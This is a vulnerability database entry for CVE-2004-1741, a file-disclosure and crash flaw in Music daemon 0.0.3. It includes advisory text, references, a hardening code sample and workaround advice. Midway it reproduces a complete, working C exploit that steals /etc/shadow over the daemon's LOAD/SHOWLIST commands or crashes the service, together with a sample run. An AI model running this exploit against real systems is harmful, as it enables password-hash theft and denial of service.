CVE-2004-1741
CVSS5.0
Published: 2004-08-23 00:00:00
Revised: 2016-10-17 23:00:17

[Original] Music daemon (musicd) 0.0.3 and earlier allows remote attackers to cause a denial of service (crash) by calling LOAD with a binary file as an argument, then calling SHOWLIST.


[CNNVD] Music Daemon LOAD command file disclosure vulnerability (CNNVD-200408-211)

Music daemon (musicd) 0.0.3 and earlier versions contain a vulnerability. A remote attacker can cause a denial of service (crash) by calling LOAD with a binary file as the argument and then calling SHOWLIST.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:music_daemon:music_daemon:0.1
cpe:/a:music_daemon:music_daemon:0.3
cpe:/a:music_daemon:music_daemon:0.2

- OVAL (technical details for detection)

No related OVAL definitions found.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1741
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1741
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-211
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109329098806595&w=2
(UNKNOWN)  BUGTRAQ  20040823 MusicDaemon <= 0.0.3 /etc/shadow Stealer / DoS Exploit
http://musicdaemon.sourceforge.net/
(PATCH)  CONFIRM  http://musicdaemon.sourceforge.net/
http://securitytracker.com/id?1011025
(UNKNOWN)  SECTRACK  1011025
http://www.securityfocus.com/bid/11006
(VENDOR_ADVISORY)  BID  11006
http://xforce.iss.net/xforce/xfdb/17068
(VENDOR_ADVISORY)  XF  musicd-load-showlist-dos(17068)

- Vulnerability information

Music Daemon LOAD command file disclosure vulnerability
Medium severity; access validation error
2004-08-23 00:00:00 2005-10-20 00:00:00
Remote
Music daemon (musicd) 0.0.3 and earlier versions contain a vulnerability. A remote attacker can cause a denial of service (crash) by calling LOAD with a binary file as the argument and then calling SHOWLIST.

- Advisory and patches

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (413)

MusicDaemon <= 0.0.3 v2 Remote DoS and /etc/shadow Stealer (EDBID:413)
linux remote
2004-08-24 Verified
0 Tal0n
N/A
/* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS
 * Vulnerability discovered by: Tal0n 05-22-04
 * Exploit code by: Tal0n 05-22-04
 *
 * Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, wsxz,
 * serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires,
 * bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g
 *
 * MusicDaemon MUST be running as root, which it does by default anyways.
 * Tested on Slackware 9 and Redhat 9, but should work generically since the
 * nature of this vulnerability doesn't require shellcode or return addresses.
 *
 *
 * Client Side View:
 *
 * root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow
 *
 * MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer
 *
 * Connected to 127.0.0.1:1234...
 * Sending exploit data...
 *
 * <*** /etc/shadow file from 127.0.0.1 ***>
 *
 * Hello
 * <snipped for privacy>
 * ......
 * bin:*:9797:0:::::
 * ftp:*:9797:0:::::
 * sshd:*:9797:0:::::
 * ......
 * </snipped for privacy>
 *
 * <*** End /etc/shadow file ***>
 *
 * root@vortex:~/test#
 *
 * Server Side View:
 *
 * root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p  1234
 * Using configuration: ../musicd.conf
 * [Mon May 17 05:26:07 2004] cmd_set() called
 * Binding to port 5555.
 * [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555
 * [Mon May 17 05:26:07 2004] cmd_modulescandir() called
 * [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port 1234.
 * [Mon May 17 05:26:11 2004] New connection!
 * [Mon May 17 05:26:11 2004] cmd_load() called
 * [Mon May 17 05:26:13 2004] cmd_show() called
 * [Mon May 17 05:26:20 2004] Client lost.
 *
 *
 * As you can see, it simply makes a connection, sends the commands, and
 * leaves. MusicDaemon doesn't even log that new connection's IPs that I
 * know of. Works very well, eh? :)
 *
 * The vulnerability is in where there is no authentication for 1. For 2, it
 * will let you "LOAD" any file on the box if you have the correct privileges,
 * and by default, as I said before, it runs as root, unless you change the
 * configuration file to make it run as a different user.
 *
 * After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab
 * the contents of the actual file. You can substitute any file you want in
 * for /etc/shadow, I just coded it to grab it because it being such an
 * important system file if you know what I mean ;).
 *
 * As for the DoS, if you "LOAD" any binary on the system, then use "SHOWLIST",
 * it will crash music daemon.
 *
 *
 */
  
  
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strlen, strcmp, memset */
#include <unistd.h>      /* read, close, sleep */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */

int main(int argc, char *argv[]) {

    char buffer[16384];

    /* Command sequences sent to musicd: LOAD a file, SHOWLIST to dump it, CLEAR. */
    char *xpldata1 = "LOAD /etc/shadow\r\n";
    char *xpldata2 = "SHOWLIST\r\n";
    char *xpldata3 = "CLEAR\r\n";
    char *dosdata1 = "LOAD /bin/cat\r\n";
    char *dosdata2 = "SHOWLIST\r\n";
    char *dosdata3 = "CLEAR\r\n";

    int len1 = strlen(xpldata1);
    int len2 = strlen(xpldata2);
    int len3 = strlen(xpldata3);
    int len4 = strlen(dosdata1);
    int len5 = strlen(dosdata2);
    int len6 = strlen(dosdata3);

    if (argc != 4) {
        printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow Stealer / DoS");
        printf("\nDiscovered and Coded by: Tal0n 05-22-04\n");
        printf("\nUsage: %s <host> <port> <option>\n", argv[0]);
        printf("\nOptions:");
        printf("\n\t\tshadow - Steal /etc/shadow file");
        printf("\n\t\tdos - DoS Music Daemon\n\n");
        return 0;
    }

    printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow Stealer / DoS\n\n");

    int sock;
    struct sockaddr_in remote;

    memset(&remote, 0, sizeof(remote));
    remote.sin_family = AF_INET;
    remote.sin_port = htons(atoi(argv[2]));
    remote.sin_addr.s_addr = inet_addr(argv[1]);

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("\nError: Can't create socket!\n\n");
        return -1;
    }

    if (connect(sock, (struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) {
        printf("\nError: Can't connect to %s:%s!\n\n", argv[1], argv[2]);
        return -1;
    }

    printf("Connected to %s:%s...\n", argv[1], argv[2]);

    if (strcmp(argv[3], "dos") == 0) {

        printf("Sending DoS data...\n");

        send(sock, dosdata1, len4, 0);
        sleep(2);
        send(sock, dosdata2, len5, 0);
        sleep(2);
        send(sock, dosdata3, len6, 0);

        printf("\nTarget %s DoS'd!\n\n", argv[1]);

        return 0;
    }

    if (strcmp(argv[3], "shadow") == 0) {

        printf("Sending exploit data...\n");

        send(sock, xpldata1, len1, 0);
        sleep(2);
        send(sock, xpldata2, len2, 0);
        sleep(5);

        printf("Done! Grabbing /etc/shadow...\n");

        /* Leave one byte so the buffer stays NUL-terminated for printf. */
        memset(buffer, 0, sizeof(buffer));
        read(sock, buffer, sizeof(buffer) - 1);

        sleep(2);

        printf("\n<*** /etc/shadow file from %s ***>\n\n", argv[1]);
        printf("%s", buffer);
        printf("\n<*** End /etc/shadow file ***>\n\n");

        send(sock, xpldata3, len3, 0);
        sleep(1);
        close(sock);

        return 0;
    }

    return 0;
}

// milw0rm.com [2004-08-24]
		

- Vulnerability information

9114
Musicdaemon musicd Multiple Command Remote DoS
Remote / Network Access; Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Music daemon 'musicd' contains a flaw that may allow a remote denial of service. The issue is triggered when a malicious user sends a LOAD command followed by a specially crafted SHOWLIST command to the server which crashes the daemon, and will result in loss of availability for the server.

- Timeline

2004-08-23 Unknown
2004-08-23 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: do not run musicd under root privileges and do not allow access to the service from untrusted machines.

- References

- Vulnerability author

- Vulnerability information

Music Daemon LOAD Command File Disclosure Vulnerability
Access Validation Error 11006
Yes No
2004-08-23 12:00:00 2009-07-12 06:17:00
Discovery of this vulnerability is credited to Tal0n <cyber_talon@hotmail.com>.

- Affected program versions

Music daemon: Music daemon 0.3
Music daemon: Music daemon 0.2
Music daemon: Music daemon 0.1

- Vulnerability discussion

Music daemon is reported prone to a remote file disclosure vulnerability. The vulnerability presents itself due to a lack of sufficient sanitization performed on Music daemon command arguments.

A remote attacker may exploit this vulnerability in order to disclose the contents of files with the privilege of the Music daemon (musicd) process.

It is reported that if a binary file is specified as an argument for the affected command the attacker may cause the affected daemon to crash.
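A hardened argument check for the LOAD command, added here to illustrate the missing sanitization described above; it is not musicd's code, and the music root, the function name and the extension allow-list are assumptions. It confines LOAD to relative paths under a configured music directory and to playlist/audio extensions, so both "LOAD /etc/shadow" and "LOAD /bin/cat" are refused before any file is opened.

```c
/* Hardened LOAD-argument check (added example, not musicd's own code).
 * musicd 0.0.3 handed the LOAD argument straight to its file loader, so
 * "LOAD /etc/shadow" disclosed the file and "LOAD /bin/cat" + SHOWLIST
 * crashed the daemon. This hypothetical check confines LOAD to a music
 * root and to an allow-list of playlist/audio extensions (assumed values). */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define MAX_PATH_LEN 1024
static const char *const allowed_ext[] = { ".mp3", ".ogg", ".m3u", NULL };

static bool has_allowed_ext(const char *name) {
    const char *dot = strrchr(name, '.');
    if (!dot || strchr(dot, '/')) return false; /* no extension, or dot is in a directory name */
    for (int i = 0; allowed_ext[i]; i++)
        if (strcmp(dot, allowed_ext[i]) == 0) return true;
    return false;
}

/* Normalise arg lexically under root. Returns true and writes root/<rel> to out
 * on success; false for absolute paths, ".." escapes, CR/LF, or a bad extension. */
bool resolve_load_arg(const char *root, const char *arg, char *out, size_t outlen) {
    if (!arg || *arg == '\0' || *arg == '/' || strpbrk(arg, "\r\n")) return false;
    char copy[MAX_PATH_LEN], rel[MAX_PATH_LEN] = "";
    size_t rlen = 0;
    if (strlen(arg) >= sizeof copy) return false;
    strcpy(copy, arg);
    for (char *seg = strtok(copy, "/"); seg; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0) continue;
        if (strcmp(seg, "..") == 0) {
            if (rlen == 0) return false; /* would climb above the music root */
            char *slash = strrchr(rel, '/');
            if (slash) *slash = '\0'; else rel[0] = '\0';
            rlen = strlen(rel);
            continue;
        }
        size_t slen = strlen(seg);
        if (rlen + slen + 2 > sizeof rel) return false;
        if (rlen) rel[rlen++] = '/';
        memcpy(rel + rlen, seg, slen + 1);
        rlen += slen;
    }
    if (rlen == 0 || !has_allowed_ext(rel)) return false;
    int n = snprintf(out, outlen, "%s/%s", root, rel);
    return n > 0 && (size_t)n < outlen;
}
```

The check is purely lexical; a deployed version should also resolve the final path with realpath() or open it with O_NOFOLLOW so that a symlink inside the music root cannot point back outside it.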

- Exploit

The following exploit is available:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References
